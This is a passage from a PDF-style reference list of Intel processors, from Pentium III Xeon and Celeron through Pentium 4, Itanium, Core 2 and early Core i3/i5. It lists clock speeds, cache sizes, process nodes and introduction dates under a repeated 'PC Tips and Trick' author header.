 400 MHz Introduced June 29, 1998
 450 MHz (512 KB L2 Cache) Introduced October 6, 1998
 450 MHz (1 MB and 2 MB L2 Cache) Introduced January 5, 1999
 PIII Xeon
 Introduced October 25, 1999
 Number of transistors: 9.5 million at 0.25 μm or 28 million at 0.18 μm
 L2 cache is 256 KB, 1 MB, or 2 MB Advanced Transfer Cache (Integrated)
 Processor Package Style is Single Edge Contact Cartridge (S.E.C.C.2) or SC330
 System Bus clock rate 133 MHz (256 KB L2 cache) or 100 MHz (1–2 MB L2 cache)
 System Bus width 64 bits
 Addressable memory 64 GB
 Used in two-way servers and workstations (256 KB L2) or 4- and 8-way servers (1–
2 MB L2)
 Family 6 model 10

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Variants
 500 MHz (0.25 μm process) Introduced March 17, 1999
 550 MHz (0.25 μm process) Introduced August 23, 1999
 600 MHz (0.18 μm process, 256 KB L2 cache) Introduced October 25, 1999
 667 MHz (0.18 μm process, 256 KB L2 cache) Introduced October 25, 1999
 733 MHz (0.18 μm process, 256 KB L2 cache) Introduced October 25, 1999
 800 MHz (0.18 μm process, 256 KB L2 cache) Introduced January 12, 2000
 866 MHz (0.18 μm process, 256 KB L2 cache) Introduced April 10, 2000
 933 MHz (0.18 μm process, 256 KB L2 cache)
 1000 MHz (0.18 μm process, 256 KB L2 cache) Introduced August 22, 2000
 700 MHz (0.18 μm process, 1–2 MB L2 cache) Introduced May 22, 2000
Celeron (Pentium III Coppermine-based):

 Coppermine-128, 0.18 μm process technology


 Introduced March, 2000
 Streaming SIMD Extensions (SSE)
 Socket 370, FC-PGA processor package
 Number of transistors: 28.1 million
 66 MHz system bus clock rate, 100 MHz system bus clock rate from January 3, 2001
 32 kB L1 cache
 128 kB Advanced Transfer L2 cache
 Family 6 model 8
 Variants
 533 MHz
 566 MHz
 600 MHz
 633, 667, 700 MHz Introduced June 26, 2000
 733, 766 MHz Introduced November 13, 2000
 800 MHz Introduced January 3, 2001
 850 MHz Introduced April 9, 2001
 900 MHz Introduced July 2, 2001
 950, 1000, 1100 MHz Introduced August 31, 2001
 550 MHz (Mobile)
 600, 650 MHz (Mobile) Introduced June 19, 2000

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 700 MHz (Mobile) Introduced September 25, 2000


 750 MHz (Mobile) Introduced March 19, 2001
 800 MHz (Mobile)
 850 MHz (Mobile) Introduced July 2, 2001
 600 MHz (LV Mobile)
 500 MHz (ULV Mobile) Introduced January 30, 2001
 600 MHz (ULV Mobile)

XScale (chronological entry - non-x86 architechture)

 Introduced August 23, 2000


 See main entry

Pentium 4 (not 4EE, 4E, 4F), Itanium, P4-based Xeon, Itanium


2 (chronological entries)

 Introduced April 2000 – July 2002


 See main entries
Celeron (Pentium III Tualatin-based):

 Tualatin Celeron – 0.13 μm process technology


 32 KB L1 cache
 256 KB Advanced Transfer L2 cache
 100 MHz system bus clock rate
 Socket 370
 Family 6 model 11
 Variants
 1.0 GHz
 1.1 GHz
 1.2 GHz
 1.3 GHz
 1.4 GHz
Pentium M:

 Banias 0.13 μm process technology


 Introduced March 2003

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 64 KB L1 cache
 1 MB L2 cache (integrated)
 Based on Pentium III core, with SSE2 SIMD instructions and deeper pipeline
 Number of transistors 77 million
 Micro-FCPGA, Micro-FCBGA processor package
 Heart of the Intel mobile Centrino system
 400 MHz Netburst-style system bus
 Family 6 model 9
 Variants
 900 MHz (ultra low voltage)
 1.0 GHz (ultra low voltage)
 1.1 GHz (low voltage)
 1.2 GHz (low voltage)
 1.3 GHz
 1.4 GHz
 1.5 GHz
 1.6 GHz
 1.7 GHz
 Dothan 0.09 μm (90 nm) process technology
 Introduced May 2004
 2 MB L2 cache
 140 million transistors
 Revised data prefetch unit
 400 MHz Netburst-style system bus
 21W TDP
 Family 6 model 13
 Variants
 1.00 GHz (Pentium M 723) (ultra low voltage, 5W TDP)
 1.10 GHz (Pentium M 733) (ultra low voltage, 5W TDP)
 1.20 GHz (Pentium M 753) (ultra low voltage, 5W TDP)
 1.30 GHz (Pentium M 718) (low voltage, 10W TDP)
 1.40 GHz (Pentium M 738) (low voltage, 10W TDP)
 1.50 GHz (Pentium M 758) (low voltage, 10W TDP)
 1.60 GHz (Pentium M 778) (low voltage, 10W TDP)
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

 1.40 GHz (Pentium M 710)


 1.50 GHz (Pentium M 715)
 1.60 GHz (Pentium M 725)
 1.70 GHz (Pentium M 735)
 1.80 GHz (Pentium M 745)
 2.00 GHz (Pentium M 755)
 2.10 GHz (Pentium M 765)
 Dothan 533 0.09 μm (90 nm) process technology
 Introduced Q1 2005
 Same as Dothan except with a 533 MHz NetBurst-style system bus and 27W TDP
 Variants
 1.60 GHz (Pentium M 730)
 1.73 GHz (Pentium M 740)
 1.86 GHz (Pentium M 750)
 2.00 GHz (Pentium M 760)
 2.13 GHz (Pentium M 770)
 2.26 GHz (Pentium M 780)
 Stealey 0.09 μm (90 nm) process technology
 Introduced Q2 2007
 512 KB L2, 3W TDP
 Variants
 600 MHz (A100)
 800 MHz (A110)
Celeron M:

 Banias-512 0.13 μm process technology


 Introduced March 2003
 64 KB L1 cache
 512 KB L2 cache (integrated)
 SSE2 SIMD instructions
 No SpeedStep technology, is not part of the 'Centrino' package
 Family 6 model 9
 Variants
 310 – 1.20 GHz

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 320 – 1.30 GHz


 330 – 1.40 GHz
 340 – 1.50 GHz
 Dothan-1024 90 nm process technology
 64 KB L1 cache
 1 MB L2 cache (integrated)
 SSE2 SIMD instructions
 No SpeedStep technology, is not part of the 'Centrino' package
 Variants
 350 – 1.30 GHz
 350J – 1.30 GHz, with Execute Disable bit
 360 – 1.40 GHz
 360J – 1.40 GHz, with Execute Disable bit
 370 – 1.50 GHz, with Execute Disable bit
 Family 6, Model 13, Stepping 8[5]
 380 – 1.60 GHz, with Execute Disable bit
 390 – 1.70 GHz, with Execute Disable bit
 Yonah-1024 65 nm process technology
 64 KB L1 cache
 1 MB L2 cache (integrated)
 SSE3 SIMD instructions, 533 MHz front-side bus, execute-disable bit
 No SpeedStep technology, is not part of the 'Centrino' package
 Variants
 410 – 1.46 GHz
 420 – 1.60 GHz,
 423 – 1.06 GHz (ultra low voltage)
 430 – 1.73 GHz
 440 – 1.86 GHz
 443 – 1.20 GHz (ultra low voltage)
 450 – 2.00 GHz

Intel Core

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Yonah 0.065 μm (65 nm) process technology


 Introduced January 2006
 533/667 MHz front side bus
 2 MB (Shared on Duo) L2 cache
 SSE3 SIMD instructions
 31W TDP (T versions)
 Family 6, Model 14
 Variants:
 Intel Core Duo T2700 2.33 GHz
 Intel Core Duo T2600 2.16 GHz
 Intel Core Duo T2500 2 GHz
 Intel Core Duo T2450 2 GHz
 Intel Core Duo T2400 1.83 GHz
 Intel Core Duo T2300 1.66 GHz
 Intel Core Duo T2050 1.6 GHz
 Intel Core Duo T2300e 1.66 GHz
 Intel Core Duo T2080 1.73 GHz
 Intel Core Duo L2500 1.83 GHz (low voltage, 15W TDP)
 Intel Core Duo L2400 1.66 GHz (low voltage, 15W TDP)
 Intel Core Duo L2300 1.5 GHz (low voltage, 15W TDP)
 Intel Core Duo U2500 1.2 GHz (ultra low voltage, 9W TDP)
 Intel Core Solo T1350 1.86 GHz (533 FSB)
 Intel Core Solo T1300 1.66 GHz
 Intel Core Solo T1200 1.5 GHz[6]
Dual-Core Xeon LV:

 Sossaman 0.065 μm (65 nm) process technology


 Introduced March 2006
 Based on Yonah core, with SSE3 SIMD instructions
 667 MHz frontside bus
 2 MB Shared L2 cache
 Variants
 2.0 GHz

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

32-bit processors: NetBurst microarchitecture:


Pentium 4

 0.18 μm process technology (1.40 and 1.50 GHz)


 Introduced November 20, 2000
 L2 cache was 256 KB Advanced Transfer Cache (Integrated)
 Processor Package Style was PGA423, PGA478
 System Bus clock rate 400 MHz
 SSE2 SIMD Extensions
 Number of transistors 42 million
 Used in desktops and entry-level workstations
 0.18 μm process technology (1.7 GHz)
 Introduced April 23, 2001
 See the 1.4 and 1.5 chips for details
 0.18 μm process technology (1.6 and 1.8 GHz)
 Introduced July 2, 2001
 See 1.4 and 1.5 chips for details
 Core Voltage is 1.15 volts in Maximum Performance Mode; 1.05 volts in Battery
Optimized Mode
 Power <1 watt in Battery Optimized Mode
 Used in full-size and then light mobile PCs
 0.18 μm process technology Willamette (1.9 and 2.0 GHz)
 Introduced August 27, 2001
 See 1.4 and 1.5 chips for details
 Family 15 model 1
 Pentium 4 (2 GHz, 2.20 GHz)
 Introduced January 7, 2002
 Pentium 4 (2.4 GHz)
 Introduced April 2, 2002
 0.13 μm process technology Northwood A (1.7, 1.8, 1.9, 2, 2.2, 2.4, 2.5, 2.6,
2.8(OEM),3.0(OEM) GHz)
 Improved branch prediction and other microcodes tweaks
 512 KB integrated L2 cache
 Number of transistors 55 million

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 400 MHz system bus.


 Family 15 model 2
 0.13 μm process technology Northwood B (2.26, 2.4, 2.53, 2.66, 2.8, 3.06 GHz)
 533 MHz system bus. (3.06 includes Intel's Hyper-Threading technology).
 0.13 μm process technology Northwood C (2.4, 2.6, 2.8, 3.0, 3.2, 3.4 GHz)
 800 MHz system bus (all versions include Hyper-Threading)
 6500 to 10,000 MIPS

Itanium (chronological entry - new non-x86 architechture)

 Introduced 2001
 See main entry
Xeon:

 Official designation now Xeon, i.e. not "Pentium 4 Xeon"


 Xeon 1.4, 1.5, 1.7 GHz
 Introduced May 21, 2001
 L2 cache was 256 KB Advanced Transfer Cache (Integrated)
 Processor Package Style was Organic Land Grid Array 603 (OLGA 603)
 System Bus clock rate 400 MHz
 SSE2 SIMD Extensions
 Used in high-performance and mid-range dual processor enabled workstations
 Xeon 2.0 GHz and up to 3.6 GHz
 Introduced September 25, 2001

Itanium 2 (chronological entry - new non-x86 architechture)

 Introduced July 2002


 See main entry
Mobile Pentium 4-M:

 0.13 μm process technology


 55 million transistors
 cache L2 512 KB
 BUS a 400 MHz
 Supports up to 1 GB of DDR 266 MHz Memory
 Supports ACPI 2.0 and APM 1.2 System Power Management
 1.3 V – 1.2 V (SpeedStep)
 Power: 1.2 GHz 20.8 W, 1.6 GHz 30 W, 2.6 GHz 35 W
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

 Sleep Power 5 W (1.2 V)


 Deeper Sleep Power = 2.9 W (1.0 V)

 1.40 GHz – 23 April 2002
 1.50 GHz – 23 April 2002
 1.60 GHz – 4 March 2002
 1.70 GHz – 4 March 2002
 1.80 GHz – 23 April 2002
 1.90 GHz – 24 June 2002
 2.00 GHz – 24 June 2002
 2.20 GHz – 16 September 2002
 2.40 GHz – 14 January 2003
 2.50 GHz – 16 April 2003
 2.60 GHz – 11 June 2003
Pentium 4 EE:

 Introduced September 2003


 EE = "Extreme Edition"
 Built from the Xeon's "Gallatin" core, but with 2 MB cache
Pentium 4E:

 Introduced February 2004


 built on 0.09 μm (90 nm) process technology Prescott (2.4A, 2.8, 2.8A, 3.0, 3.2, 3.4, 3.6,
3.8) 1 MB L2 cache
 533 MHz system bus (2.4A and 2.8A only)
 Number of transistors 125 million on 1 MB Models
 Number of transistors 169 million on 2 MB Models
 800 MHz system bus (all other models)
 Hyper-Threading support is only available on CPUs using the 800 MHz system bus.
 The processor's integer instruction pipeline has been increased from 20 stages to 31
stages, which theoretically allows for even greater bandwidth.
 7500 to 11,000 MIPS
 LGA 775 versions are in the 5xx series (32-bit) and 5x1 series (with Intel 64)
 The 6xx series has 2 MB L2 cache and Intel 64
Pentium 4F:

 Introduced Spring 2004


 Same core as 4E, "Prescott"
 3.2–3.6 GHz

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Starting with the D0 stepping of this processor, Intel 64 64-bit extensions has also been
incorporated

64-bit processors: IA-64:

 New instruction set, not at all related to x86.


 Before the feature was eliminated (Montecito, July 2006) IA-64 processors supported 32-bit
x86 in hardware, but slowly (see its 2001 market reception and 2006 architectural changes).
[dubious – discuss]

Itanium:

 Code name Merced


 Family 7
 Released May 29, 2001
 733 MHz and 800 MHz
 2MB cache
 All recalled and replaced by Itanium 2
Itanium 2:

 Family 0x1F
 Released July 2002
 900 MHz – 1.6 GHz
 McKinley 900 MHz 1.5 MB cache, Model 0x0
 McKinley 1 GHz, 3 MB cache, Model 0x0
 Deerfield 1 GHz, 1.5 MB cache, Model 0x1
 Madison 1.3 GHz, 3 MB cache, Model 0x1
 Madison 1.4 GHz, 4 MB cache, Model 0x1
 Madison 1.5 GHz, 6 MB cache, Model 0x1
 Madison 1.67 GHz, 9 MB cache, Model 0x1
 Hondo 1.4 GHz, 4 MB cache, dual-core MCM, Model 0x1

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

64-bit processors: Intel 64 – NetBurst microarchitecture:

 Intel Extended Memory 64 Technology


 Mostly compatible with AMD's AMD64 architecture
 Introduced Spring 2004, with the Pentium 4F (D0 and later P4 steppings)
Pentium 4F:

 Prescott-2M built on 0.09 μm (90 nm) process technology


 2.8–3.8 GHz (model numbers 6x0)
 Introduced February 20, 2005
 Same features as Prescott with the addition of:
 2 MB cache
 Intel 64-bit
 Enhanced Intel SpeedStep Technology (EIST)
 Cedar Mill built on 0.065 μm (65 nm) process technology
 3.0–3.6 (model numbers 6x1)
 Introduced January 16, 2006
 Die shrink of Prescott-2M
 Same features as Prescott-2M
 Family 15 Model 4
Pentium D:
Main article: List of Intel Pentium D microprocessors

 Dual-core microprocessor
 No Hyper-Threading
 800(4×200) MHz front side bus
 LGA 775 (Socket T)

 Smithfield – 90 nm process technology (2.66–3.2 GHz)


 Introduced May 26, 2005
 2.66–3.2 GHz (model numbers 805–840)
 Number of transistors 230 million
 1 MB × 2 (non-shared, 2 MB total) L2 cache
 Cache coherency between cores requires communication over the FSB
 Performance increase of 60% over similarly clocked Prescott
 2.66 GHz (533 MHz FSB) Pentium D 805 introduced December 2005
 Contains 2x Prescott dies in one package
 Family 15 Model 4

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Presler – 65 nm process technology (2.8–3.6 GHz)


 Introduced January 16, 2006
 2.8–3.6 GHz (model numbers 915–960)
 Number of transistors 376 million
 2 MB × 2 (non-shared, 4 MB total) L2 cache
 Contains 2x Cedar Mill dies in one package
 Variants
 Pentium D 945

Pentium Extreme Edition

 Dual-core microprocessor
 Enabled Hyper-Threading
 800(4×200) MHz front side bus

 Smithfield – 90 nm process technology (3.2 GHz)


 Variants
 Pentium 840 EE – 3.20 GHz (2 × 1 MB L2)

 Presler – 65 nm process technology (3.46, 3.73)


 2 MB × 2 (non-shared, 4 MB total) L2 cache
 Variants
 Pentium 955 EE – 3.46 GHz, 1066 MHz front side bus
 Pentium 965 EE – 3.73 GHz, 1066 MHz front side bus
 Pentium 969 EE – 3.73 GHz, 1066 MHz front side bus
Xeon:
 Nocona
 Introduced 2004

 Irwindale
 Introduced 2004

 Cranford
 Introduced April 2005
 MP version of Nocona

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Potomac
 Introduced April 2005
 Cranford with 8 MB of L3 cache

 Paxville DP (2.8 GHz)


 Introduced October 10, 2005
 Dual-core version of Irwindale, with 4 MB of L2 Cache (2 MB per core)
 2.8 GHz
 800 MT/s front side bus

 Paxville MP – 90 nm process (2.67 – 3.0 GHz)


 Introduced November 1, 2005
 Dual-core Xeon 7000 series
 MP-capable version of Paxville DP
 2 MB of L2 Cache (1 MB per core) or 4 MB of L2 (2 MB per core)
 667 MT/s FSB or 800 MT/s FSB

 Dempsey – 65 nm process (2.67 – 3.73 GHz)


 Introduced May 23, 2006
 Dual-core Xeon 5000 series
 MP version of Presler
 667 MT/s or 1066 MT/s FSB
 4 MB of L2 Cache (2 MB per core)
 LGA 771 (Socket J).

 Tulsa – 65 nm process (2.5 – 3.4 GHz)


 Introduced August 29, 2006
 Dual-core Xeon 7100-series
 Improved version of Paxville MP
 667 MT/s or 800 MT/s FSB

64-bit processors: Intel 64 – Core microarchitecture[edit]


Xeon[edit]
 Woodcrest – 65 nm process technology

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Server and Workstation CPU (SMP support for dual CPU system)
 Introduced June 26, 2006
 Dual-core
 Intel VT-x, multiple OS support
 EIST (Enhanced Intel SpeedStep Technology) in 5140, 5148LV, 5150, 5160
 Execute Disable Bit
 TXT, enhanced security hardware extensions
 SSSE3 SIMD instructions
 iAMT2 (Intel Active Management Technology), remotely manage computers
 Variants
 Xeon 5160 – 3.00 GHz (4 MB L2, 1333 MHz FSB, 80 W)
 Xeon 5150 – 2.66 GHz (4 MB L2, 1333 MHz FSB, 65 W)
 Xeon 5140 – 2.33 GHz (4 MB L2, 1333 MHz FSB, 65 W)
 Xeon 5130 – 2.00 GHz (4 MB L2, 1333 MHz FSB, 65 W)
 Xeon 5120 – 1.86 GHz (4 MB L2, 1066 MHz FSB, 65 W)
 Xeon 5110 – 1.60 GHz (4 MB L2, 1066 MHz FSB, 65 W)
 Xeon 5148LV – 2.33 GHz (4 MB L2, 1333 MHz FSB, 40 W) (low voltage
edition)

 Clovertown – 65 nm process technology


 Server and Workstation CPU (SMP support for dual CPU system)
 Introduced December 13, 2006
 Quad-core
 Intel VT-x, multiple OS support
 EIST (Enhanced Intel SpeedStep Technology) in E5365, L5335
 Execute Disable Bit
 TXT, enhanced security hardware extensions
 SSSE3 SIMD instructions
 iAMT2 (Intel Active Management Technology), remotely manage computers
 Variants
 Xeon X5355 – 2.66 GHz (2×4 MB L2, 1333 MHz FSB, 105 W)
 Xeon E5345 – 2.33 GHz (2×4 MB L2, 1333 MHz FSB, 80 W)
 Xeon E5335 – 2.00 GHz (2×4 MB L2, 1333 MHz FSB, 80 W)
 Xeon E5320 – 1.86 GHz (2×4 MB L2, 1066 MHz FSB, 65 W)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Xeon E5310 – 1.60 GHz (2×4 MB L2, 1066 MHz FSB, 65 W)


 Xeon L5320 – 1.86 GHz (2×4 MB L2, 1066 MHz FSB, 50 W) (low voltage
edition)
Intel Core 2[edit]
 Conroe – 65 nm process technology
 Desktop CPU (SMP support restricted to 2 CPUs)
 Two cores on one die
 Introduced July 27, 2006
 SSSE3 SIMD instructions
 Number of transistors: 291 million
 64 KB of L1 cache per core (32+32 KB 8-way)
 Intel VT-x, multiple OS support
 TXT, enhanced security hardware extensions
 Execute Disable Bit
 EIST (Enhanced Intel SpeedStep Technology)
 iAMT2 (Intel Active Management Technology), remotely manage computers
 LGA 775
 Variants
 Core 2 Duo E6850 – 3.00 GHz (4 MB L2, 1333 MHz FSB)
 Core 2 Duo X6800 – 2.93 GHz (4 MB L2, 1066 MHz FSB)
 Core 2 Duo E6750 – 2.67 GHz (4 MB L2, 1333 MHz FSB, 65W)
 Core 2 Duo E6700 – 2.67 GHz (4 MB L2, 1066 MHz FSB)
 Core 2 Duo E6600 – 2.40 GHz (4 MB L2, 1066 MHz FSB, 65W)
 Core 2 Duo E6550 – 2.33 GHz (4 MB L2, 1333 MHz FSB)
 Core 2 Duo E6420 – 2.13 GHz (4 MB L2, 1066 MHz FSB)
 Core 2 Duo E6400 – 2.13 GHz (2 MB L2, 1066 MHz FSB)
 Core 2 Duo E6320 – 1.86 GHz (4 MB L2, 1066 MHz FSB) Family 6, Model
15, Stepping 6
 Core 2 Duo E6300 – 1.86 GHz (2 MB L2, 1066 MHz FSB)

 Conroe XE – 65 nm process technology


 Desktop Extreme Edition CPU (SMP support restricted to 2 CPUs)
 Introduced July 27, 2006

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 same features as Conroe


 LGA 775
 Variants
 Core 2 Extreme X6800 – 2.93 GHz (4 MB L2, 1066 MHz FSB)

 Allendale – 65 nm process technology


 Desktop CPU (SMP support restricted to 2 CPUs)
 Two CPUs on one die
 Introduced January 21, 2007
 SSSE3 SIMD instructions
 Number of transistors 167 million
 TXT, enhanced security hardware extensions
 Execute Disable Bit
 EIST (Enhanced Intel SpeedStep Technology)
 iAMT2 (Intel Active Management Technology), remotely manage computers
 LGA 775
 Variants
 Core 2 Duo E4700 – 2.60 GHz (2 MB L2, 800 MHz FSB)
 Core 2 Duo E4600 – 2.40 GHz (2 MB L2, 800 MHz FSB)
 Core 2 Duo E4500 – 2.20 GHz (2 MB L2, 800 MHz FSB)
 Core 2 Duo E4400 – 2.00 GHz (2 MB L2, 800 MHz FSB)
 Core 2 Duo E4300 – 1.80 GHz (2 MB L2, 800 MHz FSB) Family 6, Model 15,
Stepping 2

 Merom – 65 nm process technology


 Mobile CPU (SMP support restricted to 2 CPUs)
 Introduced July 27, 2006
 Family 6, Model 15
 same features as Conroe
 Socket M / Socket P
 Variants
 Core 2 Duo T7800 – 2.60 GHz (4 MB L2, 800 MHz FSB) (Santa Rosa
platform)
 Core 2 Duo T7700 – 2.40 GHz (4 MB L2, 800 MHz FSB)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Core 2 Duo T7600 – 2.33 GHz (4 MB L2, 667 MHz FSB)


 Core 2 Duo T7500 – 2.20 GHz (4 MB L2, 800 MHz FSB)
 Core 2 Duo T7400 – 2.16 GHz (4 MB L2, 667 MHz FSB)
 Core 2 Duo T7300 – 2.00 GHz (4 MB L2, 800 MHz FSB)
 Core 2 Duo T7250 – 2.00 GHz (2 MB L2, 800 MHz FSB)
 Core 2 Duo T7200 – 2.00 GHz (4 MB L2, 667 MHz FSB)
 Core 2 Duo T7100 – 1.80 GHz (2 MB L2, 800 MHz FSB)
 Core 2 Duo T5600 – 1.83 GHz (2 MB L2, 667 MHz FSB) Family 6, Model 15,
Stepping 6
 Core 2 Duo T5550 – 1.83 GHz (2 MB L2, 667 MHz FSB, no VT)
 Core 2 Duo T5500 – 1.66 GHz (2 MB L2, 667 MHz FSB, no VT)
 Core 2 Duo T5470 – 1.60 GHz (2 MB L2, 800 MHz FSB, no VT) Family 6,
Model 15, Stepping 13
 Core 2 Duo T5450 – 1.66 GHz (2 MB L2, 667 MHz FSB, no VT)
 Core 2 Duo T5300 – 1.73 GHz (2 MB L2, 533 MHz FSB, no VT)
 Core 2 Duo T5270 – 1.40 GHz (2 MB L2, 800 MHz FSB, no VT)
 Core 2 Duo T5250 – 1.50 GHz (2 MB L2, 667 MHz FSB, no VT)
 Core 2 Duo T5200 – 1.60 GHz (2 MB L2, 533 MHz FSB, no VT)
 Core 2 Duo L7500 – 1.60 GHz (4 MB L2, 800 MHz FSB) (low voltage)
 Core 2 Duo L7400 – 1.50 GHz (4 MB L2, 667 MHz FSB) (low voltage)
 Core 2 Duo L7300 – 1.40 GHz (4 MB L2, 800 MHz FSB) (low voltage)
 Core 2 Duo L7200 – 1.33 GHz (4 MB L2, 667 MHz FSB) (low voltage)
 Core 2 Duo U7700 – 1.33 GHz (2 MB L2, 533 MHz FSB) (ultra low voltage)
 Core 2 Duo U7600 – 1.20 GHz (2 MB L2, 533 MHz FSB) (ultra low voltage)
 Core 2 Duo U7500 – 1.06 GHz (2 MB L2, 533 MHz FSB) (ultra low voltage)

 Kentsfield – 65 nm process technology


 Two dual-core CPU dies in one package.
 Desktop CPU quad-core (SMP support restricted to 4 CPUs)
 Introduced December 13, 2006
 same features as Conroe but with 4 CPU cores
 Number of transistors 586 million
 LGA 775
 Family 6, Model 15, Stepping 11

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Variants
 Core 2 Extreme QX6850 – 3 GHz (2×4 MB L2 Cache, 1333 MHz FSB)
 Core 2 Extreme QX6800 – 2.93 GHz (2×4 MB L2 Cache, 1066 MHz FSB)
(April 9, 2007)
 Core 2 Extreme QX6700 – 2.66 GHz (2×4 MB L2 Cache, 1066 MHz FSB)
(November 14, 2006)
 Core 2 Quad Q6700 – 2.66 GHz (2×4 MB L2 Cache, 1066 MHz FSB) (July
22, 2007)
 Core 2 Quad Q6600 – 2.40 GHz (2×4 MB L2 Cache, 1066 MHz FSB)
(January 7, 2007)

 Wolfdale – 45 nm process technology


 Die shrink of Conroe
 Same features as Conroe with the addition of:
 50% more cache, 6 MB as opposed to 4 MB
 Intel Trusted Execution Technology
 SSE4 SIMD instructions
 Number of transistors 410 million
 Variants
 Core 2 Duo E8600 – 3.33 GHz (6 MB L2, 1333 MHz FSB)
 Core 2 Duo E8500 – 3.16 GHz (6 MB L2, 1333 MHz FSB)
 Core 2 Duo E8435 – 3.07 GHz (6 MB L2, 1066 MHz FSB)
 Core 2 Duo E8400 – 3.00 GHz (6 MB L2, 1333 MHz FSB)
 Core 2 Duo E8335 – 2.93 GHz (6 MB L2, 1066 MHz FSB)
 Core 2 Duo E8300 – 2.83 GHz (6 MB L2, 1333 MHz FSB)
 Core 2 Duo E8235 – 2.80 GHz (6 MB L2, 1066 MHz FSB)
 Core 2 Duo E8200 – 2.66 GHz (6 MB L2, 1333 MHz FSB)
 Core 2 Duo E8135 – 2.66 GHz (6 MB L2, 1066 MHz FSB)
 Core 2 Duo E8190 – 2.66 GHz (6 MB L2, 1333 MHz FSB, no TXT, no VT)

 Wolfdale-3M – 45 nm process technology


 Intel Trusted Execution Technology
 Variants
 Core 2 Duo E7600 – 3.06 GHz (3 MB L2, 1066 MHz FSB)
 Core 2 Duo E7500 – 2.93 GHz (3 MB L2, 1066 MHz FSB)
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

 Core 2 Duo E7400 – 2.80 GHz (3 MB L2, 1066 MHz FSB)


 Core 2 Duo E7300 – 2.66 GHz (3 MB L2, 1066 MHz FSB)
 Core 2 Duo E7200 – 2.53 GHz (3 MB L2, 1066 MHz FSB)

 Yorkfield – 45 nm process technology


 Quad-core CPU
 Die shrink of Kentsfield
 Contains 2x Wolfdale dual-core dies in one package
 Same features as Wolfdale
 Number of transistors 820 million
 Variants
 Core 2 Extreme QX9770 – 3.20 GHz (2×6 MB L2, 1600 MHz FSB)
 Core 2 Extreme QX9650 – 3.00 GHz (2×6 MB L2, 1333 MHz FSB)
 Core 2 Quad Q9705 – 3.16 GHz (2×3 MB L2, 1333 MHz FSB)
 Core 2 Quad Q9700 – 3.16 GHz (2×3 MB L2, 1333 MHz FSB)
 Core 2 Quad Q9650 – 3 GHz (2×6 MB L2, 1333 MHz FSB)
 Core 2 Quad Q9550 – 2.83 GHz (2×6 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q9550s – 2.83 GHz (2×6 MB L2, 1333 MHz FSB, 65W TDP)
 Core 2 Quad Q9450 – 2.66 GHz (2×6 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q9505 – 2.83 GHz (2×3 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q9505s – 2.83 GHz (2×3 MB L2, 1333 MHz FSB, 65W TDP)
 Core 2 Quad Q9500 – 2.83 GHz (2×3 MB L2, 1333 MHz FSB, 95W TDP, no
TXT)
 Core 2 Quad Q9400 – 2.66 GHz (2×3 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q9400s – 2.66 GHz (2×3 MB L2, 1333 MHz FSB, 65W TDP)
 Core 2 Quad Q9300 – 2.50 GHz (2×3 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q8400 – 2.66 GHz (2×2 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q8400s – 2.66 GHz (2×2 MB L2, 1333 MHz FSB, 65W TDP)
 Core 2 Quad Q8300 – 2.50 GHz (2×2 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q8300s – 2.50 GHz (2×2 MB L2, 1333 MHz FSB, 65W TDP)
 Core 2 Quad Q8200 – 2.33 GHz (2×2 MB L2, 1333 MHz FSB, 95W TDP)
 Core 2 Quad Q8200s – 2.33 GHz (2×2 MB L2, 1333 MHz FSB, 65W TDP)
 Core 2 Quad Q7600 – 2.70 GHz (2×1 MB L2, 800 MHz FSB, no SSE4) (no
Q7600 listed here)

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Intel Core2 Quad Mobile Processor Family – 45 nm process technology


 Quad-core CPU
 Variants
 Core 2 Quad Q9100 – 2.26 GHz (2×6 MB L2, 1066 MHz FSB, 45W TDP)
 Core 2 Quad Q9000 – 2.00 GHz (2×3 MB L2, 1066 MHz FSB, 45W TDP)

64-bit processors: Intel 64 – Nehalem microarchitecture:


Intel Pentium:
 Clarkdale – 32 nm process technology
 2 physical cores/2 threads
 3 MB L3 cache
 Introduced January 2010
 Socket 1156 LGA
 2-channel DDR3
 Integrated HD GPU
 Variants
 G6950 – 2.8 GHz (no Hyper-Threading)[7]
 G6960 – 2.933 GHz (no Hyper-Threading)
Core i3:
 Clarkdale – 32 nm process technology
 2 physical cores/4 threads
 64 Kb L1 cache
 512 Kb L2 cache
 4 MB L3 cache
 Introduced January, 2010
 Socket 1156 LGA
 2-channel DDR3
 Integrated HD GPU
 Variants
 530 – 2.93 GHz Hyper-Threading
 540 – 3.06 GHz Hyper-Threading

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 550 – 3.2 GHz Hyper-Threading


 560 – 3.33 GHz Hyper-Threading
Core i5:
 Lynnfield – 45 nm process technology
 4 physical cores
 32+32 Kb (per core) L1 cache
 256 Kb (per core) L2 cache
 8 MB common L3 cache
 Introduced September 8, 2009
 Family 6 Model E (Ext. Model 1E)
 Socket 1156 LGA
 2-channel DDR3
 Variants
 750S – 2.40 GHz/3.20 GHz Turbo Boost
 750 – 2.66 GHz/3.20 GHz Turbo Boost
 760 – 2.80 GHz/3.33 GHz Turbo Boost

 Clarkdale – 32 nm process technology


 2 physical cores/4 threads
